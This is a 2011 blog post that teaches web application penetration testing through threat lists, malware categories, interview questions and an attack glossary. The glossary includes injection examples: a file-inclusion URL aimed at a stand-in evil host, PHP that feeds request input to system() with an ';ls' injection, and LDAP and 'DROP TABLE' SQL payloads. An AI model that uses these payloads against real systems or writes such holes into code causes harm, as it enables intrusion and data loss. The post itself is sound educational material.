Wednesday, 9 March 2011

Web Application Penetration Testing


A web application or webapp is an application that is accessed via web browser over a network such as the Internet or an intranet. It is also a computer software application that is coded in a browser-supported language (such as HTML, JavaScript, Java, etc.) and reliant on a common web browser to render the application executable
Analysis shows that
1% of the bugs (programming errors) cause 50% of     security problems
If configured right, information systems can survive almost all attacks
Application security deals with checking the vulnerabilities in application and to ensure there is secure methods followed to remove these security flaws at all stages of SDLC.
 
 
What are the threats?
• denial-of-service
• unauthorized use or misuse of computing  systems
• loss/alteration/compromise of data or software
• monetary/financial loss
• loss or endangerment of human life
• loss of trust in computer/network system
• loss of public confidence
 
 
Who are the threats?
• Competitors
• Hackers
• Corporate Spies
• Disgruntled Employees
• Careless Employees
• Professional Thieves
• Visitors
 
Security Testing:
 In order to find vulnerabilities in web applications we need
to identify them:
Methods:
Code audit (a lot of work) also refers to White Box Testing
Testing (manual or automated) also refers to Black Box Testing
Manual testing: a human being attacks a web application using his experience, knowledge and tools
Automated testing: a human being uses an automated vulnerability scanner to attack a web application
Security Testing helps to understand the extent to which a system/application can protect itself from unauthorized access, hacking, cracking, any code damage, etc.
•Verify and validate that applications meet the security requirements
•Identify security vulnerabilities of  applications in the given environment
This type of testing needs sophisticated testing techniques
 

Virus,Trojan,Worm

Virus:  A computer virus is a small program written to alter the way a computer operates, without the permission or knowledge of the user. A virus must meet two criteria:
 
It must execute itself. It often places its own code in the path of execution of another program.
  • It must replicate itself. For example, it may replace other executable files with a copy of the virus infected file. Viruses can infect desktop computers and network servers alike.
Some viruses are programmed to damage the computer by damaging programs, deleting files, or reformatting the hard disk. Others are not designed to do any damage, but simply to replicate themselves and make their presence known by presenting text, video, and audio messages. Even these benign viruses can create problems for the computer user. They typically take up computer memory used by legitimate programs. As a result, they often cause erratic behavior and can result in system crashes. In addition, many viruses are bug-ridden, and these bugs may lead to system crashes and data loss

Five recognized types of viruses:

File infector viruses:File infector viruses infect program files. These viruses normally infect executable code, such as .com and .exe files. The can infect other files when an infected program is run from floppy, hard drive, or from the network. Many of these viruses are memory resident. After memory becomes infected, any noninfected executable that runs becomes infected. Examples of known file infector viruses include Jerusalem and Cascade.

Boot sector viruses:Boot sector viruses infect the system area of a disk; that is, the boot record on floppy disks and hard disks. All floppy disks and hard disks (including disks containing only data) contain a small program in the boot record that is run when the computer starts up. Boot sector viruses attach themselves to this part of the disk and activate when the user attempts to start up from the infected disk. These viruses are always memory resident in nature. Most were written for DOS, but, all PCs, regardless of the operating system, are potential targets of this type of virus. All that is required to become infected is to attempt to start up your computer with an infected floppy disk Thereafter, while the virus remains in memory, all floppy disks that are not write protected will become infected when the floppy disk is accessed. Examples of boot sector viruses are Form, Disk Killer, Michelangelo, and Stoned.

Master boot record viruses:Master boot record viruses are memory-resident viruses that infect disks in the same manner as boot sector viruses. The difference between these two virus types is where the viral code is located. Master boot record infectors normally save a legitimate copy of the master boot record in an different location. Windows NT computers that become infected by either boot sector viruses or master boot sector viruses will not boot. This is due to the difference in how the operating system accesses its boot information, as compared to Windows 98/Me. If your Windows NT systems is formatted with FAT partitions you can usually remove the virus by booting to DOS and using antivirus software. If the boot partition is NTFS, the system must be recovered by using the three Windows NT Setup disks. Examples of master boot record infectors are NYB, AntiExe, and Unashamed.

Multipartite viruses:Multipartite (also known as polypartite) viruses infect both boot records and program files. These are particularly difficult to repair. If the boot area is cleaned, but the files are not, the boot area will be reinfected. The same holds true for cleaning infected files. If the virus is not removed from the boot area, any files that you have cleaned will be reinfected. Examples of multipartite viruses include One_Half, Emperor, Anthrax and Tequilla.

Macro viruses:These types of viruses infect data files. They are the most common and have cost corporations the most money and time trying to repair. With the advent of Visual Basic in Microsoft's Office 97, a macro virus can be written that not only infects data files, but also can infect other files as well. Macro viruses infect Microsoft Office Word, Excel, PowerPoint and Access files. Newer strains are now turning up in other programs as well. All of these viruses use another program's internal programming language, which was created to allow users to automate certain tasks within that program. Because of the ease with which these viruses can be created, there are now thousands of them in circulation. Examples of macro viruses include W97M.Melissa, WM.NiceDay and W97M.Groov.

 Trojan horses: These are impostors—files that claim to be something desirable but, in fact, are malicious. A very important distinction between Trojan horse programs and true viruses is that they do not replicate themselves. Trojan horses contain malicious code that when triggered cause loss, or even theft, of data. For a Trojan horse to spread, you must invite these programs onto your computers; for example, by opening an email attachment or downloading and running a file from the Internet. Trojan.Vundo is a Trojan horse.

WormWorms are programs that replicate themselves from system to system without the use of a host file. This is in contrast to viruses, which requires the spreading of an infected host file. Although worms generally exist inside of other files, often Word or Excel documents, there is a difference between how worms and viruses use the host file. Usually the worm will release a document that already has the "worm" macro inside the document. The entire document will travel from computer to computer, so the entire document should be considered the worm W32.Mydoom.AX@mm is an example of a worm

Security/Penetration Testing Interview Questions

  • What type of security testing you performed?
  • What types of web testing security problems do you know?
  • Please classify vulnerabilities that you know.
  • What are two common techniques used to protect a password file?
  • What is integer overflow?
  • What is your understanding of root causes of vulnerabilities?
  • What is ISO 17799?
  • Can you describe security defect prevention?
  • List and briefly define three classes of intruders.
  • What are three benefits that can be provided by an intrusion detection system?
  • What services are provided by the SSL Record Protocol?
  • Why do we need validate users input for length and characters?
  • Why we need to keep track of individual users and authentication?
  • What is runtime inspection?
  • Describe with examples Fuzzers and Sniffers tools:
  • Define buffer overflows.
  • What are format string vulnerabilities?
  • What is SQL injection?
  • Provide example of command injection.
  • Provide example of broken access control.
  • List and briefly define the parameters that define an SSL session state.
  • List and briefly define the parameters that define an SSL session connection.
  • Why do we need port scanning?
  • How to use an interactive proxy and a set of fuzz strings to manually test the application’s handling of data?
  • What is cookie gathering?
  • What is a honeypot?
  • What is phishing attack?
  • What is a dual signature and what is its purpose?
  • How can you ensure that all input fields are properly validated to prevent code injection attacks?
  • What tools can you use to validate the strength of SID (session ID)?
  • What is file enumeration?
  • What steps are involved in the SSL Record Protocol transmission?
  • What are hidden fields in HTTP?
  • What protocols comprise SSL?
  • How to implement (create) a custom fuzz utility and test it against your application?
  • Describe SOAP and WSDL.
  • List and briefly define the principal categories of SET participants.
  • How to test a scriptable ActiveX object?
  • What is the difference between statistical anomaly detection and rule-based intrusion detection?
  • What metrics are useful for profile-based intrusion detection?
  • What is the difference between rule-based anomaly detection and rule-based penetration identification?
  • What is a salt in the context of UNIX password management?
  • List and briefly define four techniques used to avoid guessable passwords.
  • What is the difference between an SSL connection and an SSL session?
  • List and briefly define Acronyms and Abbreviations Related to Software security
  • Write an example of misusing strcpy() in C and C++ in such a way that a buffer overflow condition exists as a bug
  • Why we use firewall for security when we have facilities like access-list on routers ?
  • What are the most important steps you would recommend for securing a new web server? Web application?
  • You have been asked to review the source code for a compiled script that is being used to validate logon credentials for a web application. The file is called "logon_validate" and a typical logon request looks like this -
  • If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?
  • What do you see as challenges to successfully deploying/monitoring web intrusion detection?
  • What online resources do you use to keep abreast of web security issues? Can you give an example of a recent web security vulnerability or threat?
  • What does this log entry indicate? How could you identify what the contents are of the "hacked.htm" file that the attacker is trying to upload?
  • What are some examples of you how you would attempt to gain access?
  • What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?
  • One of your web servers is logging multiple requests similar to the following:
  • What is your definition of the term "Cross-Site Scripting"? What is the potential impact to servers and clients?
  • What do you see as the most critical and current threats effecting Internet accessible websites?
    • What is a firewall?
    • Describe how to manage a firewall
    • What is a Denial of Service attack?
    • What is a “spoofed” packet?
    • What is a SYN Flood?
    • What do you do if you are a victim of a DoS?
    • What is GPG/PGP?
    • What is SSH?
    • What is SSL? How do you create certificates?
    • What would you do if you discovered a UNIX or Network device on your network has been compromised?
    • What would you do if you discovered a Windows system on your network has been comrpromised?
    • What is DNS Hijacking?
    • What is a log host?
    • What is IDS or IDP, and can you give me an example of one?
    • Why are proxy servers useful?
    • What is web-caching?
  • What are the most important steps you would recommend for securing a new web server?

    The following are the most important steps for securing a new web server:
    1. Update/patch the web server software
    2. Ensure that the server functionality is minimized and disable the extra modules
    3. Always remove the fault scripts / data
    4. Increase the verboseness of logging
    5. Update the ownership / permissions of the files.

    What are the most important steps you would recommend for securing a new web server?

    • Minimize rights.
    • Update permissions.
    • Delete default data and scripts.
    • Make use of software firewall.
    • Enable and make use of IIS logging.
    • Regular backup.
    • Updating the windows tool installed.


Important Security Terminology

Abuse of Functionality: An attack technique that uses the features and functionality of a web site to consume, defraud, or circumvent the site’s access controls. See also “Denial of Service”.
ActiveX controls: A program, called a “control”, developed using ActiveX controls technologies. ActiveX controls controls can be downloaded and executed within technology-enabled Web browsers. ActiveX controls is a set of rules for how applications should share information. ActiveX controls controls can be developed in C, C++, Visual Basic, and Java. See also “Java”, “Java Applets”, “JavaScript”, “Web Browser”.
AJAX: AJAX stands for Asynchronous JavaScript and XML. This browser based technology allows a website to perform additional resource requests without refreshing the user page by utilizing the XMLHttpRequest Javascript object.
Anti-Automation: Security measure that prevents automated programs from exercising web site functionality by administering the Turing Test to a user, which only a human could pass. See also “Visual Verification”.
Application Server: A software server, normally using HTTP, which has the ability to execute dynamic web applications. Also known a middleware, this piece of software is normally installed on or near the web server where it can be called upon. See also “Web Application”, “Web Server”.
Authentication: The process of verifying the identity or location of a user, service or application. Authentication is performed using at least one of three mechanisms: “something you have”, “something you know” or “something you are”. The authenticating application may provide different services based on the location, access method, time of day, etc. See also “Insufficient Authentication”.
Authorization: The determination of what resources a user, service or application has permission to access. Accessible resources can be URL’s, files, directories, servlets, databases, execution paths, etc. See also “Insufficient Authorization”.
Basic Authentication: A simple form of client-side authentication supported in HTTP. The http-client sends a request header to the web server containing a Base64 encoded username and password. If the username/password combination is valid, the web server grants the client access to the requested resource. See also “Authentication”, “Insufficient Authentication”.
Brute Force: An automated process of trial and error used to guess the “secret” protecting a system. Examples of these secrets include usernames, passwords or cryptographic keys. See also “Authentication”, “Insufficient Authentication”, “Password Recover System”, “Weak Password Recovery Validation”.
Buffer Overflow: An exploitation technique that alters the flow of an application by overwriting parts of memory. Buffer Overflows are a common cause of malfunctioning software. If the data written into a buffer exceeds its size, adjacent memory space will be corrupted and normally produce a fault. An attacker may be able to utilize a buffer overflow situation to alter an application´s process flow. Overfilling the buffer and rewriting memory-stack pointers could be used to execute arbitrary operating-system commands.
CGI Scanner: Automated security program that searches for well-known vulnerabilities in web servers and off-the-shelf web application software. Often CGI Scanners are not very “stateful” in their analysis and only test a series HTTP requests against known CGI strings. See also, “Web Application Vulnerability Scanner.”
CGI Security: (Obsolete) See “Web Application Security”.
Client-Side Scripting: Web browser feature that extends the functionality and interactivity of static HyperText markup language (HTML) web pages. Examples of Client-Side Scripting languages are JavaScript, JScript and VBScript. See also “ActiveX controls”, “Java Applets”.
Common Gateway Interface: (Acronym - CGI) Programming standard for software to interface and execute applications residing on web servers. See also “Web Application”, “Application Server”, “Web Server”.
Configuration File Disclosure: (Obsolete) See “Predictable File Location”.
Content Spoofing: An attack technique used to trick a user into thinking that fake web site content is legitimate data.
Cookie: Small amount of data sent by the web server, to a web client, which can be stored and retrieved at a later time. Typically cookies are used to keep track of a user’s state as they traverse a web site. See also “Cookie Manipulation”.
Cookie Manipulation: Altering or modification of cookie values, on the client’s web browser, to exploit security issues within a web application. Attackers will normally manipulate cookie values to fraudulently authenticate themselves to a web site. This is an example of the problem of trusting the user to provide reasonable input. See also “Cookie”.
Code Injection is the general name for a lot of types of attacks which depend on inserting code, which is interprated by the application. Such an attack may be be performed by adding strings of characters into a cookie or argument values in the URI. This attack makes use of lack of accurate input/output data validation, for example:
Example 1
If a site uses the include() function, which operates on variables sent with the GET method, and there is no validation performed on them, then the attacker may try to execute different code other than the author of the code had in mind.
The URL below displays information about how to contact with the testsite company.
http://testsite.com/index.php?page=contact.php
Below the altered code is code from http://evilsite.com/evilcode.php. The script "evilcode.php" may contain, for example, a phpinfo() function, which is useful for gaining information about the configuration of the environment in which the web service runs.
http://testsite.com/?page=http://evilsite.com/evilcode.php
Example 3
<?php
$varerror = system('cat '.$_GET['pageid'], $valoretorno);
echo $varerror;
?>
by using that kind of code we can attak as show in example number 2
using live http headers or using method get you can make this kind of petition:
vulnerable.php?pageid=loquesea;ls
ls is the command we are executing but we can use any other commands of the server.
Cookie Poisoning: (Obsolete) See “Cookie Manipulation”.
Cross-Site Scripting: (Acronym – XSS) An attack technique that forces a web site to echo client-supplied data, which execute in a user’s web browser. When a user is Cross-Site Scripted, the attacker will have access to all web browser content (cookies, history, application version, etc). See also “Client-Side Scripting”.
Debug Commands: Application debugging features or commands that assist in identifying programming errors during the software development process.
Denial of Service: (Acronym – DoS) An attack technique that consumes all of a web site’s available resources with the intent of rendering legitimate use impossible. Resources include CPU time, memory utilization, bandwidth, disk space, etc. When any of these resources reach full capacity, the system will normally be inaccessible to normal user activity. See also “Abuse of Functionality”.
Directory Browsing: (Obsolete) See “Directory Indexing”.
Directory Enumeration: (Obsolete) See “Predictable File Location”.
Directory Indexing: A feature common to most popular web servers, that exposes contents of a directory when no index page is present. See also “Predictable File Location”.
Directory Traversal: A technique used to exploit web sites by accessing files and commands beyond the document root directory. Most web sites restrict user access to a specific portion of the file-system, typically called the document root directory or CGI root directory. These directories contain the files and executables intended for public use. In most cases, a user should not be able to access any files beyond this point.
DOM Based Cross Site Scrpiting: DOM based cross-site scripting (or "DOM based XSS" in short) is a “cross-site scripting” attack that makes use of insecure Javascript (or in general - client side) programming that takes place in response pages, to effectively incur an XSS condition. In DOM based XSS, the attacker affects the Javascript execution in a target page (in the attacked domain) by providing it with data in the URL or the Referer, which the script insecurely uses. The script may apply the eval() function to the malicious data, or embed it in the DOM (thus making the browser potentially render it as Javascript and run it). This is in contrast to "standard" XSS, where the malicious data is embedded to the page at the server side. In some cases, DOM based XSS can even be conducted in such way that the malicious payload doesn´t even reach the server, which makes this attack more unobtrusive.
Encoding Attacks: An exploitation technique that aids an attack by changing the format of user-supplied data to bypass sanity checking filters. See also “Null Injection”.
Filename Manipulation: An attack technique used to exploit web sites by manipulating URL filenames to cause application errors, discover hidden content, or display the source code of an application. See also “Predictable File Location”.
Filter-Bypass Manipulation: See “Encoding Attacks”.
Forced Browsing: See “Predictable File Location”.
Form Field Manipulation: Altering or modification of HTML Form-Field input values or HTTP post-data to exploit security issues within a web application. See also “Parameter Tampering”, “Cookie Manipulation”.
Format String Attack: An exploit technique that alters the flow of an application by using string formatting library features to access other memory space.
Frame Spoofing: (Obsolete) See “Content Spoofing”.
HyperText Transfer Protocol: (Acronym – HTTP) A protocol scheme used on the World Wide Web. HTTP describes the way a web-client requests data and how a web server responds to those requests. See also “Web Server”, “Web Browser”.
HTTP Request Smuggling: HTTP Request Smuggling works by taking advantage of the discrepancies in parsing when one or more HTTP devices/entities (e.g. cache server, proxy server, web application firewall, etc.) are in the data flow between the user and the web server. HTTP Request Smuggling enables various attacks “web cache poisoning”, “session hijacking”, “cross-site scripting” as well as the ability to bypass web application firewall protection. The attacker sends multiple specially-crafted HTTP requests that cause the two attacked entities (e.g. a proxy server and a web server, or a firewall and a web server) to see two different sets of requests, allowing the hacker to smuggle a request to one device without the other device being aware of it.
HTTP Response Smuggling: HTTP response smuggling is an enhancement of the basic “HTTP response splitting” technique, which can evade anti- HTTP response splitting measures. HTTP response smuggling makes use of “HTTP request smuggling”-like techniques to exploit the discrepancies between what an anti- HTTP Response Splitting mechanism would consider to be the HTTP response stream, and the response stream as parsed by a proxy server (or a browser). So, while an anti- HTTP response splitting mechanism may consider a particular response stream harmless (single HTTP response), a proxy/browser may still parse it as two HTTP responses, and hence be susceptible to all the outcomes of the original HTTP response splitting technique. For example, some anti- HTTP response splitting mechanisms in use by some application engines forbid the application from inserting a header containing CR+LF to the response. Yet an attacker can force the application to insert a header containing CRs, thereby circumventing the defense mechanism. Some proxy servers may still treat CR (only) as a header (and response) separator, and as such the combination of web server and proxy server will still be vulnerable to an attack that may poison the proxy´s cache.
HTTP Response Splitting: An HTTP response splitting attack causes the web server to send out two HTTP responses, where it typically only sends out one HTTP response (hence the name - "response splitting"). This can be described as HTTP response injection, and is typically conducted by injecting malicious data into an HTTP response header, and using CR+LF characters to shape and terminate the first response, and then completely shape and control the additional response. Having this second, "unexpected" response enables the attacker to fool a client that receives this extra response by forcing this client to first emit a second request. The client then matches the second, attacker-controlled response to the second, attacker-controlled request. The net result (looking at the second request-response pair) is that the client is forced to send an arbitrary request to the vulnerable server, and in response, the client receives an arbitrary response crafted by the attacker. This condition enables “cross-site scripting” and “cache poisoning”.
Information Leakage: When a web site reveals sensitive data, such as developer comments or error messages, which aids an attacker in exploiting the system. See also “Verbose Messages”.
Insufficient Authentication: When a web site permits an attacker to access sensitive content or functionality without verifying their identity. See also “Authentication”.
Insufficient Authorization: When a web site permits an attacker to access sensitive content or functionality that should require increased access control restrictions. See also “Authorization”.
Insufficient Session Expiration: When a web site permits an attacker to reuse old session credentials or session ID’s for authorization. See also “Session Replay”, “Session Credential”, “Session ID”, “Session Manipulation”.
Insufficient Process Validation: When a web site permits an attacker to bypass or circumvent the intended flow control of an application.
Java: A popular programming language developed by Sun Microsystems(tm). See also “ActiveX controls”, “Web Browser”, “JavaScript”, “Client-Side Scripting”.
Java Applets: An applet is a program written in the Java programming language that can be included in a web page. When a Java enabled web browser views a page containing an applet, the code is executed by the Java Virtual Machine (JVM). See also “Web Browser”, “Java”, “ActiveX controls”, “JavaScript”, “Client-Side Scripting”.
Java Script: A popular web browser client-side scripting language used to create dynamic web page content. See also “Active X”, “Java Applets”, “Client-Side Scripting”.
Known CGI file: See “Predictable File Location”.
Known Directory: See “Predictable File Location”.
LDAP Injection: A technique for exploiting a web site by altering backend LDAP statements through manipulating application input. Similarly to the methodology of SQL Injection. See also “Parameter Tampering”, “Form Field Manipulation”.
Example 1
In a page with a user search form, the following code is responsible to catch input value and generate a LDAP query that will be used in LDAP database.
 <input type="text" size=20 name="userName">Insert the username</input>
The LDAP query is narrowed down for performance and the underlying code for this function might be the following:
 String ldapSearchQuery = "(cn=" + $userName + ")";
 System.out.println(ldapSearchQuery);
If the variable $userName is not validated, it could be possible accomplish LDAP injection, as follows:
·         If a user puts “*” on box search, the system may return all the usernames on the LDAP base
·         If a user puts “jonys) (| (password = * ) )”, it will generate the code bellow revealing jonys’ password ( cn = jonys ) ( | (password = * ) )
Meta-Character Injection: An attack technique used to exploit web sites by sending in meta-characters, which have special meaning to a web application, as data input. Meta-characters are characters that have special meaning to programming languages, operating system commands, individual program procedures, database queries, etc. These special characters can adversely alter the behavior of a web application. See also “Null Injection”, “Parameter Tampering”, “SQL Injection”, “LDAP Injection”, “Cross-Site Scripting”.
Null Injection: An exploitation technique used to bypass sanity checking filters by adding URL encoded null-byte characters to user-supplied data. When developers create web applications in a variety of programming languages, these web applications often pass data to underlying lower level C-functions for further processing and functionality. If a user-supplied string contains a null character (\0), the web application may stop processing the string at the point of the null. Null Injection is a form of a meta-character Injection attack. See also “Encoding Attacks”, “Parameter Tampering”, “Meta Character Injection”.
OS Command Injection: See “OS Commanding”.
OS Commanding: An attack technique used to exploit web sites by executing operating-system commands through manipulating application input. See also “Parameter Tampering”, “Form Field Manipulation”.
Page Sequencing: (Obsolete) See “Insufficient Process Validation”.
Parameter Tampering: Altering or modification of the parameter name and value pairs in a URL. Also known as “URL Manipulation”. See also “Uniform Resource Locator”.
Password Recovery System: An automated process that allows a user to recover or reset his password in the event that it has been lost or forgotten. See also “Weak Password Recovery Validation”.
Predictable File Location: A technique used to access hidden web site content or functionality by making educated guesses, manually or automatically, of the names and locations of files. Predictable file locations may include directories, CGI’s, configuration files, backup files, temporary files, etc.
Secure Sockets Layer: (Acronym – SSL) An industry standard public-key protocol used to create encrypted tunnels between two network-connected devices. See also “Transport Layer Security”.
Session Credential: A string of data provided by the web server, normally stored within a cookie or URL, which identifies a user and authorizes them to perform various actions. See also “Session ID”.
Session Fixation: An attack technique that forces a user’s session credential or session ID to an explicit value. See also “Session Credential”, “Session ID”.
Session Forging: See “Session Prediction”.
Session Hi-Jacking: The result of a user’s session being compromised by an attacker. The attacker could reuse this stolen session to masquerade as the user. See also “Session Prediction”, “Session Credential”, “Session ID”.
Session ID: A string of data provided by the web server, normally stored within a cookie or URL. A Session ID tracks a user’s session, or perhaps just his current session, as he traverse the web site.
Session Manipulation: An attack technique used to hi-jack another user’s session by altering a session ID or session credential value. See also “Session Prediction”, “Session Hi-Jacking”, “Session Credential”, “Session ID”.
Session Prediction: An attack technique used to create fraudulent session credentials or guess other user’s current session ID’s. If successful, an attacker could reuse this stolen session to masquerade as another user. See also “Session Credential”, “Session ID”, “Session Hi-Jacking”.
Session Replay: When a web site permits an attacker to reuse old session credentials or session ID’s for authorization. See also “Session ID”, “Session Credential”, “Insufficient Session Expiration”.
Session Tampering: See “Session Manipulation”
SQL Injection: An attack technique used to exploit web sites by altering backend SQL statements through manipulating application input. See also “Parameter Tampering”, “Form Field Manipulation”
statement = "SELECT * FROM users WHERE name = '" + userName + "';"
SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';

SSI Injection: A server-side exploit technique that allows an attacker to send code into a web application, which will be executed by the web server. See also "Meta-Character Injection", “Parameter Tampering”, “Form Field Manipulation”.
Transport Layer Security: (Acronym – TLS) The more secure successor to SSL. The TLS protocol provides communications privacy over the Internet. The protocol allows client/server applications to communicate in a way that is designed to prevent eavesdropping, tampering, or message forgery. TLS is based on the SSL protocol, but the two systems are not interoperable. See also “Secure Sockets Layer”.
Universal Resource Locator: (Acronym – URL) A standard way of specifying the location of an object, normally a web page, on the Internet. See also “Parameter Tampering”.
Unvalidated Input: When a web application does not properly sanity-check user-supplied data input.
URL Manipulation: Altering or modification of a web applications parameter name and value pairs. Also known as “Parameter Tampering”.
User-Agent Manipulation: A technique used to bypass web site browser requirement restrictions by altering the value sent within an HTTP User-Agent header. See also “Cookie Manipulation”.
Verbose Messages: Detailed pieces of information revealed by a web site, which could aid an attacker in exploiting the system.
Visual Verification: Visual oriented method of anti-automation that prevents automated programs from exercising web site functionality by determining if there is presence of mind. See also “Anti-Automation”.
Weak Password Recovery Validation: When a web site permits an attacker to illegally obtain, change or recover another user’s password. See also “Password Recovery System”.
Web Application: A software application, executed by a web server, which responds to dynamic web page requests over HTTP. See also “Web Server”, “Web Application”, “Web Service”.
Web Application Scanner: See “Web Application Vulnerability Scanner”.
Web Application Security: Science of information security relating to the World Wide Web, HTTP and web application software. Also known as “Web Security”.
Web Application Firewall: An intermediary device, sitting between a web-client and a web server, analyzing OSI Layer-7 messages for violations in the programmed security policy. A web application firewall is used as a security device protecting the web server from attack. See also “Web Application Security”, “Web Server”.
Web Application Vulnerability Scanner: An automated security program that searches for software vulnerabilities within web applications. See also “Web Application Security”.
Web Browser: A program used to display HyperText markup language (HTML) web pages sent by a web server. See also “ActiveX controls”, “Cookie”, “Java Applets”, “JavaScript”, “Client-Side Scripting”.
Web (or browser) cache poisoning: The act of adding/overwriting a cache entry (of a caching proxy server, or a browser) with forged and possibly malicious data is called cache poisoning. In its most potent form, an attacker can force an arbitrary entry (URL of choice, page contents of choice) to the cache. In HTTP response splitting [LINK], the attacker can choose the URL´s path and query (the host, port and scheme must be the vulnerable host´s), and the entire page contents. In HTTP request smuggling, the attacker can choose URL as in HTTP response splitting, but the page contents must be obtained from a URL on the site. At any rate, cache poisoning can be considered a form of defacement, whose scope is determined by the coverage of the cache (i.e. browser - 1 user, forward proxy - 1 ISP/organization, reverse proxy - all users), and the strength of the attack (full page control over /index.html vs. partial control).
Web Security: See “Web Application Security”.
Web Security Assessment: A process of performing a security review of a web application by searching for design flaws, vulnerabilities and inherent weaknesses. See also “Web Application Security”.
Web Security Scanner: See “Web Application Vulnerability Scanner”.
Web Server: A general-purpose software application that handles and responds to HTTP requests. A web server may utilize a web application for dynamic web page content. See also “Web Application”, “Application Server”, “HyperText Transfer Protocol”.
Web Service: A software application that uses Extensible Markup Language (XML) formatted messages to communicate over HTTP. Typically, software applications interact with web services rather than normal users. See also “Web Server”, “Web Application”, “Application Server”, “HyperText Transfer Protocol”.